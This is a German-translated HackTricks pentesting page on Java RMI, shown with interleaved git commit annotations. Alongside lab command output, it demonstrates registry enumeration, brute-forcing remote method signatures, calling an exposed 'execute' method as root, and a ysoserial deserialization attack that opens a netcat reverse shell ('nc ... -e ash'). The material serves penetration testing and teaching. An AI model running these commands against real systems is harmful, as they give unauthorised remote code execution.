Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/1099-pentesting-java-rmi.md

339 lines
20 KiB
Markdown
Raw Normal View History

GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
# 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
{% hint style="success" %}
Lernen & üben Sie AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Lernen & üben Sie GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
<summary>Unterstützen Sie HackTricks</summary>
arte
2024-01-03 10:42:55 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)!
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repos senden.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
{% endhint %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
update
2023-01-01 16:19:07 +00:00
\
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Verwenden Sie [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=1099-pentesting-java-rmi), um einfach **Workflows** zu erstellen und zu **automatisieren**, die von den **fortschrittlichsten** Community-Tools der Welt unterstützt werden.\
Zugang heute erhalten:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
Translated ['crypto-and-stego/certificates.md', 'generic-methodologies-a
2024-05-06 11:11:29 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=1099-pentesting-java-rmi" %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
## Grundinformationen
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
_Java Remote Method Invocation_, oder _Java RMI_, ist ein objektorientierter _RPC_-Mechanismus, der es einem Objekt, das sich in einer _Java-virtuellen Maschine_ befindet, ermöglicht, Methoden auf einem Objekt in einer anderen _Java-virtuellen Maschine_ aufzurufen. Dies ermöglicht Entwicklern, verteilte Anwendungen unter Verwendung eines objektorientierten Paradigmas zu schreiben. Eine kurze Einführung in _Java RMI_ aus einer offensiven Perspektive finden Sie in [diesem Blackhat-Vortrag](https://youtu.be/t\_aw1mDNhzI?t=202).
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
**Standardport:** 1090,1098,1099,1199,4443-4446,8999-9010,9999
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
PORT STATE SERVICE VERSION
1090/tcp open ssl/java-rmi Java RMI
9010/tcp open java-rmi Java RMI
37471/tcp open java-rmi Java RMI
40259/tcp open ssl/java-rmi Java RMI
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Üblicherweise sind nur die Standard-_Java RMI_-Komponenten (das _RMI-Registry_ und das _Activation System_) an gängigen Ports gebunden. Die _remote objects_, die die tatsächliche _RMI_-Anwendung implementieren, sind normalerweise an zufällige Ports gebunden, wie im obigen Output gezeigt.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
_nmap_ hat manchmal Schwierigkeiten, _SSL_-geschützte _RMI_-Dienste zu identifizieren. Wenn Sie auf einen unbekannten SSL-Dienst an einem gängigen _RMI_-Port stoßen, sollten Sie weiter untersuchen.
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-29 21:05:19 +00:00
## RMI-Komponenten
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Um es einfach auszudrücken, ermöglicht _Java RMI_ einem Entwickler, ein _Java-Objekt_ im Netzwerk verfügbar zu machen. Dies öffnet einen _TCP_-Port, über den Clients eine Verbindung herstellen und Methoden auf dem entsprechenden Objekt aufrufen können. Obwohl dies einfach klingt, gibt es mehrere Herausforderungen, die _Java RMI_ lösen muss:
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
1. Um einen Methodenaufruf über _Java RMI_ zu versenden, müssen die Clients die IP-Adresse, den lauschernden Port, die implementierte Klasse oder Schnittstelle und die `ObjID` des Zielobjekts kennen (die `ObjID` ist ein eindeutiger und zufälliger Identifikator, der erstellt wird, wenn das Objekt im Netzwerk verfügbar gemacht wird. Sie ist erforderlich, da _Java RMI_ mehreren Objekten erlaubt, auf demselben _TCP_-Port zu lauschen).
2. Remote-Clients können Ressourcen auf dem Server zuweisen, indem sie Methoden auf dem exponierten Objekt aufrufen. Die _Java Virtual Machine_ muss verfolgen, welche dieser Ressourcen noch verwendet werden und welche davon gesammelt werden können.
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Die erste Herausforderung wird durch das _RMI-Registry_ gelöst, das im Grunde ein Namensdienst für _Java RMI_ ist. Das _RMI-Registry_ selbst ist ebenfalls ein _RMI-Dienst_, aber die implementierte Schnittstelle und die `ObjID` sind fest und allen _RMI_-Clients bekannt. Dies ermöglicht es _RMI_-Clients, das _RMI-Registry_ zu nutzen, indem sie nur den entsprechenden _TCP_-Port kennen.
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Wenn Entwickler ihre _Java-Objekte_ im Netzwerk verfügbar machen möchten, binden sie sie normalerweise an ein _RMI-Registry_. Das _Registry_ speichert alle Informationen, die erforderlich sind, um eine Verbindung zum Objekt herzustellen (IP-Adresse, lauschernder Port, implementierte Klasse oder Schnittstelle und den `ObjID`-Wert) und macht sie unter einem menschenlesbaren Namen (dem _gebundenen Namen_) verfügbar. Clients, die den _RMI-Dienst_ nutzen möchten, fragen das _RMI-Registry_ nach dem entsprechenden _gebundenen Namen_, und das Registry gibt alle erforderlichen Informationen zur Verbindung zurück. Somit ist die Situation im Grunde die gleiche wie bei einem gewöhnlichen _DNS_-Dienst. Die folgende Auflistung zeigt ein kleines Beispiel:
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
```java
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
import java.rmi.registry.Registry;
Update RMI source code example
2021-12-30 08:57:22 +00:00
import java.rmi.registry.LocateRegistry;
import lab.example.rmi.interfaces.RemoteService;
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
public class ExampleClient {
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
private static final String remoteHost = "172.17.0.2";
private static final String boundName = "remote-service";
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
public static void main(String[] args)
{
try {
Registry registry = LocateRegistry.getRegistry(remoteHost); // Connect to the RMI registry
RemoteService ref = (RemoteService)registry.lookup(boundName); // Lookup the desired bound name
String response = ref.remoteMethod(); // Call a remote method
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
} catch( Exception e) {
e.printStackTrace();
}
}
}
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Der zweite der oben genannten Herausforderungen wird durch den _Distributed Garbage Collector_ (_DGC_) gelöst. Dies ist ein weiterer _RMI-Dienst_ mit einem bekannten `ObjID`-Wert und er ist im Grunde an jedem _RMI-Endpunkt_ verfügbar. Wenn ein _RMI-Client_ beginnt, einen _RMI-Dienst_ zu nutzen, sendet er eine Information an den _DGC_, dass das entsprechende _remote object_ in Gebrauch ist. Der _DGC_ kann dann die Referenzanzahl verfolgen und ist in der Lage, ungenutzte Objekte zu bereinigen.
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['crypto-and-stego/certificates.md', 'generic-methodologies-a
2024-05-06 11:11:29 +00:00
Zusammen mit dem veralteten _Activation System_ sind dies die drei Standardkomponenten von _Java RMI_:
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
1. Das _RMI Registry_ (`ObjID = 0`)
Translated ['crypto-and-stego/certificates.md', 'generic-methodologies-a
2024-05-06 11:11:29 +00:00
2. Das _Activation System_ (`ObjID = 1`)
Translated to German
2024-02-10 15:36:32 +00:00
3. Der _Distributed Garbage Collector_ (`ObjID = 2`)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Die Standardkomponenten von _Java RMI_ sind seit einiger Zeit bekannte Angriffsvektoren und mehrere Schwachstellen existieren in veralteten _Java_-Versionen. Aus der Perspektive eines Angreifers sind diese Standardkomponenten interessant, da sie bekannte Klassen / Schnittstellen implementiert haben und es leicht möglich ist, mit ihnen zu interagieren. Diese Situation ist anders bei benutzerdefinierten _RMI-Diensten_. Um eine Methode auf einem _remote object_ aufzurufen, müssen Sie die entsprechende Methodensignatur im Voraus kennen. Ohne Kenntnis einer vorhandenen Methodensignatur gibt es keine Möglichkeit, mit einem _RMI-Dienst_ zu kommunizieren.
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
## RMI Enumeration
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) ist ein _Java RMI_-Schwachstellenscanner, der in der Lage ist, gängige _RMI-Schwachstellen_ automatisch zu identifizieren. Wann immer Sie einen _RMI_-Endpunkt identifizieren, sollten Sie es versuchen:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
[+]
[+] - plain-server2
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ff7, 3638117546492248534]
[+] - legacy-service
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ffc, 708796783031663206]
[+] - plain-server
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] RMI server codebase enumeration:
[+]
[+] - http://iinsecure.dev/well-hidden-development-folder/
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub
[+] --> de.qtc.rmg.server.interfaces.IPlainServer
[+]
[+] RMI server String unmarshalling enumeration:
[+]
[+] - Caught ClassNotFoundException during lookup call.
[+] --> The type java.lang.String is unmarshalled via readObject().
[+] Configuration Status: Outdated
[+]
[+] RMI server useCodebaseOnly enumeration:
[+]
[+] - Caught MalformedURLException during lookup call.
[+] --> The server attempted to parse the provided codebase (useCodebaseOnly=false).
[+] Configuration Status: Non Default
[+]
[+] RMI registry localhost bypass enumeration (CVE-2019-2684):
[+]
[+] - Caught NotBoundException during unbind call (unbind was accepeted).
[+] Vulnerability Status: Vulnerable
[+]
[+] RMI Security Manager enumeration:
[+]
[+] - Security Manager rejected access to the class loader.
[+] --> The server does use a Security Manager.
[+] Configuration Status: Current Default
[+]
[+] RMI server JEP290 enumeration:
[+]
[+] - DGC rejected deserialization of java.util.HashMap (JEP290 is installed).
[+] Vulnerability Status: Non Vulnerable
[+]
[+] RMI registry JEP290 bypass enmeration:
[+]
[+] - Caught IllegalArgumentException after sending An Trinh gadget.
[+] Vulnerability Status: Vulnerable
[+]
[+] RMI ActivationSystem enumeration:
[+]
[+] - Caught IllegalArgumentException during activate call (activator is present).
[+] --> Deserialization allowed - Vulnerability Status: Vulnerable
[+] --> Client codebase enabled - Configuration Status: Non Default
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Die Ausgabe der Enumerationsaktion wird in den [Dokumentationsseiten](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) des Projekts näher erläutert. Je nach Ergebnis sollten Sie versuchen, identifizierte Schwachstellen zu überprüfen.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
Die von _remote-method-guesser_ angezeigten `ObjID`-Werte können verwendet werden, um die Betriebszeit des Dienstes zu bestimmen. Dies kann helfen, andere Schwachstellen zu identifizieren:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] ObjNum: -4004948013687638236
[+] UID:
[+] Unique: 1442798173
[+] Time: 1640761503828 (Dec 29,2021 08:05)
[+] Count: -32760
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
## Bruteforcing Remote Methods
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Selbst wenn während der Enumeration keine Schwachstellen identifiziert wurden, könnten die verfügbaren _RMI_ Dienste dennoch gefährliche Funktionen offenbaren. Darüber hinaus ist die _RMI_ Kommunikation zu _RMI_ Standardkomponenten zwar durch Deserialisierungsfilter geschützt, jedoch sind solche Filter bei der Kommunikation mit benutzerdefinierten _RMI_ Diensten normalerweise nicht vorhanden. Daher ist es wertvoll, gültige Methodensignaturen für _RMI_ Dienste zu kennen.
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Leider unterstützt _Java RMI_ nicht die Enumeration von Methoden auf _remote objects_. Das gesagt, ist es möglich, Methodensignaturen mit Tools wie [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) oder [rmiscout](https://github.com/BishopFox/rmiscout) zu bruteforcen:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg guess 172.17.0.2 9010
[+] Reading method candidates from internal wordlist rmg.txt
[+] 752 methods were successfully parsed.
[+] Reading method candidates from internal wordlist rmiscout.txt
[+] 2550 methods were successfully parsed.
[+]
[+] Starting Method Guessing on 3281 method signature(s).
[+]
[+] MethodGuesser is running:
[+] --------------------------------
[+] [ plain-server2 ] HIT! Method with signature String execute(String dummy) exists!
[+] [ plain-server2 ] HIT! Method with signature String system(String dummy, String[] dummy2) exists!
[+] [ legacy-service ] HIT! Method with signature void logMessage(int dummy1, String dummy2) exists!
[+] [ legacy-service ] HIT! Method with signature void releaseRecord(int recordID, String tableName, Integer remoteHashCode) exists!
[+] [ legacy-service ] HIT! Method with signature String login(java.util.HashMap dummy1) exists!
[+] [6562 / 6562] [#####################################] 100%
[+] done.
[+]
[+] Listing successfully guessed methods:
[+]
[+] - plain-server2 == plain-server
[+] --> String execute(String dummy)
[+] --> String system(String dummy, String[] dummy2)
[+] - legacy-service
[+] --> void logMessage(int dummy1, String dummy2)
[+] --> void releaseRecord(int recordID, String tableName, Integer remoteHashCode)
[+] --> String login(java.util.HashMap dummy1)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
Translated to German
2024-02-10 15:36:32 +00:00
Identifizierte Methoden können wie folgt aufgerufen werden:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Translated to German
2024-02-10 15:36:32 +00:00
$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
[+] uid=0(root) gid=0(root) groups=0(root)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
Translated to German
2024-02-10 15:36:32 +00:00
Oder Sie können Deserialisierungsangriffe wie folgt durchführen:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
[+]
[+] Attempting deserialization attack on RMI endpoint...
[+]
[+] Using non primitive argument type java.lang.String on position 0
[+] Specified method signature is String execute(String dummy)
[+]
[+] Caught ClassNotFoundException during deserialization attack.
[+] Server attempted to deserialize canary class 6ac727def61a4800a09987c24352d7ea.
[+] Deserialization attack probably worked :)
$ nc -vlp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:45479.
id
uid=0(root) gid=0(root) groups=0(root)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Mehr Informationen finden Sie in diesen Artikeln:
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
* [Attacking Java RMI services after JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
Translated ['crypto-and-stego/certificates.md', 'generic-methodologies-a
2024-05-06 11:11:29 +00:00
* [Method Guessing](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://bishopfox.com/blog/rmiscout)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Neben dem Raten sollten Sie auch in Suchmaschinen oder _GitHub_ nach der Schnittstelle oder sogar der Implementierung eines gefundenen _RMI_ Dienstes suchen. Der _gebundene Name_ und der Name der implementierten Klasse oder Schnittstelle können hier hilfreich sein.
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Translated to German
2024-02-10 15:36:32 +00:00
## Bekannte Schnittstellen
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) kennzeichnet Klassen oder Schnittstellen als `known`, wenn sie in der internen Datenbank des Tools für bekannte _RMI services_ aufgeführt sind. In diesen Fällen können Sie die `known`-Aktion verwenden, um weitere Informationen über den entsprechenden _RMI service_ zu erhalten:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg enum 172.17.0.2 1090 | head -n 5
[+] RMI registry bound names:
[+]
[+] - jmxrmi
[+] --> javax.management.remote.rmi.RMIServerImpl_Stub (known class: JMX Server)
[+] Endpoint: localhost:41695 TLS: no ObjID: [7e384a4f:17e0546f16f:-7ffe, -553451807350957585]
$ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
[+] Name:
[+] JMX Server
[+]
[+] Class Name:
[+] - javax.management.remote.rmi.RMIServerImpl_Stub
[+] - javax.management.remote.rmi.RMIServer
[+]
[+] Description:
[+] Java Management Extensions (JMX) can be used to monitor and manage a running Java virtual machine.
[+] This remote object is the entrypoint for initiating a JMX connection. Clients call the newClient
[+] method usually passing a HashMap that contains connection options (e.g. credentials). The return
[+] value (RMIConnection object) is another remote object that is when used to perform JMX related
[+] actions. JMX uses the randomly assigned ObjID of the RMIConnection object as a session id.
[+]
[+] Remote Methods:
[+] - String getVersion()
[+] - javax.management.remote.rmi.RMIConnection newClient(Object params)
[+]
[+] References:
[+] - https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html
[+] - https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi
[+]
[+] Vulnerabilities:
[+]
[+] -----------------------------------
[+] Name:
[+] MLet
[+]
[+] Description:
[+] MLet is the name of an MBean that is usually available on JMX servers. It can be used to load
[+] other MBeans dynamically from user specified codebase locations (URLs). Access to the MLet MBean
[+] is therefore most of the time equivalent to remote code execution.
[+]
[+] References:
[+] - https://github.com/qtc-de/beanshooter
[+]
[+] -----------------------------------
[+] Name:
[+] Deserialization
[+]
[+] Description:
[+] Before CVE-2016-3427 got resolved, JMX accepted arbitrary objects during a call to the newClient
[+] method, resulting in insecure deserialization of untrusted objects. Despite being fixed, the
[+] actual JMX communication using the RMIConnection object is not filtered. Therefore, if you can
[+] establish a working JMX connection, you can also perform deserialization attacks.
[+]
[+] References:
[+] - https://github.com/qtc-de/beanshooter
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
## Shodan
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
* `port:1099 java`
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
## Tools
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://github.com/BishopFox/rmiscout)
* [BaRMIe](https://github.com/NickstaDB/BaRMIe)
GitBook: [master] one page modified
2020-10-05 15:35:22 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
## References
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
a
2024-02-08 21:36:35 +00:00
* [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
Translated to German
2024-02-10 15:36:32 +00:00
## HackTricks Automatische Befehle
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Protocol_Name: Java RMI #Protocol Abbreviation if there is one.
Port_Number: 1090,1098,1099,1199,4443-4446,8999-9010,9999 #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Invocation #Protocol Abbreviation Spelled out
HAC 1099
2021-08-12 12:35:15 +00:00
1099 Yaml
2021-08-15 18:15:13 +00:00
Entry_1:
Translated to German
2024-02-10 15:36:32 +00:00
Name: Enumeration
Description: Perform basic enumeration of an RMI service
Command: rmg enum {IP} {PORT}
HAC 1099
2021-08-12 12:35:15 +00:00
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:18:38 +00:00
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:32:19 +00:00
\
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
Verwenden Sie [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=1099-pentesting-java-rmi), um einfach **Workflows** zu erstellen und zu **automatisieren**, die von den **fortschrittlichsten** Community-Tools der Welt unterstützt werden.\
Zugang heute erhalten:
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/certificates.md', 'generic-methodologies-a
2024-05-06 11:11:29 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=1099-pentesting-java-rmi" %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
